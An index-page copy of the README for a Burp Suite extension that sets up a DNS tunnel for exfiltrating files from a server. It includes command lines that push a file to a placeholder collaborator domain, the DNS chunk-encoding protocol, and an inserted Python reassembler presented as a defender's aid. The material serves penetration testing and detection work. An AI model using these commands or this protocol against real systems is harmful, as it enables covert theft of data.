Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/netspi/burpcollaboratordnstunnel

A DNS tunnel utilizing the Burp Collaborator

README


# BurpCollaboratorDNSTunnel
A DNS tunnel utilizing the Burp Collaborator.

This extension sets up a private Burp Collaborator server as a DNS tunnel. One of the provided scripts will be used to exfiltrate data from a server through the DNS tunnel, displaying the tunneled data in Burp Suite.

### Interactive usage with scripts
Multiple scripts exist for exfiltrating data from different environments. A script is set up on the box whose data is to be exfiltrated and connects back to the Burp Suite instance on our local box.

_[B] Burp Suite_

_[S] Script_

1) [B] Click "Start listening"
2) [B] Copy the printed location of the Burp Collaborator server
3) [S] Run the script
4) [S] Enter the Burp Collaborator address from (2) when prompted
5) [S] Paste file name to be tunneled when prompted
6) [B] After tunneling is completed click "Poll now"

### Non-interactive usage with scripts
The scripts don't require user interaction if all the necessary information is provided as arguments.

_[B] Burp Suite_

_[S] Script_

1) [B] Click "Start listening"
2) [B] Copy the printed location of the Burp Collaborator server
3) [S] Run the script
- Windows: `./tunnel.ps1 abc123.private-burp.com .\test.txt`
- Linux: `./tunnel.sh -d abc123.private-burp.com -f test.txt`
4) [B] After tunneling is completed click "Poll now"

### Usage between 2 Burp Suite instances
_[R] Receiving Burp instance_

_[S] Sending Burp instance_

1) [R] Click "Start listening"
2) [R] Copy the printed location of the Burp Collaborator server
3) [S] Enter the address from (2) in the "Burp Collaborator Address" text box
4) [S] Paste data to be tunneled in the "Data to tunnel" text box
5) [S] Click "Tunnel Data"
6) [R] After tunneling is completed click "Poll now"

Check the "Verbose" box for debugging information to see any errors in sending/receiving data.

### Contributing
It would be nice to have more compact versions of the scripts for instances where you have to hand-type the scripts into the environment. If you would like to modify or add a script follow the basic protocol below:

#### 1) Tunneling Data
```
[dnsFlag].[chunk].[chunkNumber].[burpcollaborator] #eg: nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net
[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic
[chunk] Will be a 63-character base32-encoded chunk of data, removing any padding '='
[chunkNumber] Is the index of the current chunk in the overall tunneled data
[burpcollaborator] Is the full address of the private Burp Collaborator server
```

#### 2) Notifying size of data sent
```
[dnsFlag].[amountFlag].[totalChunkCount].[burpcollaborator] #eg: nspi.amount.1.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net
[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic
[amountFlag] This subdomain's value will be 'amount' so the tunnel can identify this as the request declaring the amount of data sent
[totalChunkCount] The total number of chunks sent through the tunnel, excluding this request
[burpcollaborator] Is the full address of the private Burp Collaborator server
```
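As an added example (not code from the repository or its scripts), the two message formats above applied from the receiving side: a small Python reassembler that takes a list of queried names, for instance names pulled from the Collaborator interaction log or a resolver log during an investigation, and rebuilds the tunneled bytes. The Collaborator addresses and the sample traffic are constructed; the first sample reuses the README's own example names.

```python
import base64
from typing import Optional

# Label values fixed by the README's protocol description.
DNS_FLAG = "nspi"        # every tunnel query starts with this subdomain
AMOUNT_FLAG = "amount"   # marks the query that declares the total chunk count
LABEL_MAX = 63           # a DNS label is at most 63 octets, hence 63-char chunks

# The README's own example queries (one chunk plus the 'amount' notification).
README_EXAMPLE = [
    "nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net",
    "nspi.amount.1.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net",
]


def parse_query(name: str, collaborator: str) -> Optional[tuple]:
    """Classify a queried name as ('chunk', index, base32) or ('amount', total, None).
    Returns None for names that are not tunnel traffic for this Collaborator.
    Names are lowercased first: resolvers may randomize label case, and base32
    is decoded case-insensitively below, so nothing is lost."""
    name = name.rstrip(".").lower()
    suffix = "." + collaborator.lower().rstrip(".")
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 3 or labels[0] != DNS_FLAG or not labels[2].isdigit():
        return None
    if labels[1] == AMOUNT_FLAG:
        return ("amount", int(labels[2]), None)
    return ("chunk", int(labels[2]), labels[1])


def reassemble(queries: list, collaborator: str) -> bytes:
    """Rebuild the tunneled bytes from queried names seen in any order."""
    chunks, total = {}, None
    for q in queries:
        parsed = parse_query(q, collaborator)
        if parsed is None:
            continue                        # ordinary DNS noise, ignore
        kind, n, payload = parsed
        if kind == "amount":
            total = n                       # count excludes the 'amount' query itself
        else:
            chunks[n] = payload
    if total is None:
        raise ValueError("no 'amount' query seen; transfer incomplete")
    missing = sorted(set(range(total)) - set(chunks))
    if missing:
        raise ValueError(f"missing chunk(s): {missing}")
    encoded = "".join(chunks[i] for i in range(total))
    encoded += "=" * (-len(encoded) % 8)    # restore the '=' padding the sender strips
    return base64.b32decode(encoded, casefold=True)


def make_sample_queries(data: bytes, collaborator: str) -> list:
    """Constructed sample traffic in the README's format, reversed and with noise."""
    enc = base64.b32encode(data).decode().rstrip("=")
    pieces = [enc[i:i + LABEL_MAX] for i in range(0, len(enc), LABEL_MAX)]
    names = [f"{DNS_FLAG}.{p}.{i}.{collaborator}" for i, p in enumerate(pieces)]
    names.append(f"{DNS_FLAG}.{AMOUNT_FLAG}.{len(pieces)}.{collaborator}")
    return list(reversed(names)) + ["www.example.com"]
```

`reassemble` fails loudly on a missing chunk or a missing 'amount' query rather than returning truncated data, which is the check a defender wants when reconstructing what actually left the host.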

### Example
At this point the original README shows an example screenshot, using one Burp Suite instance and a Kali Linux box.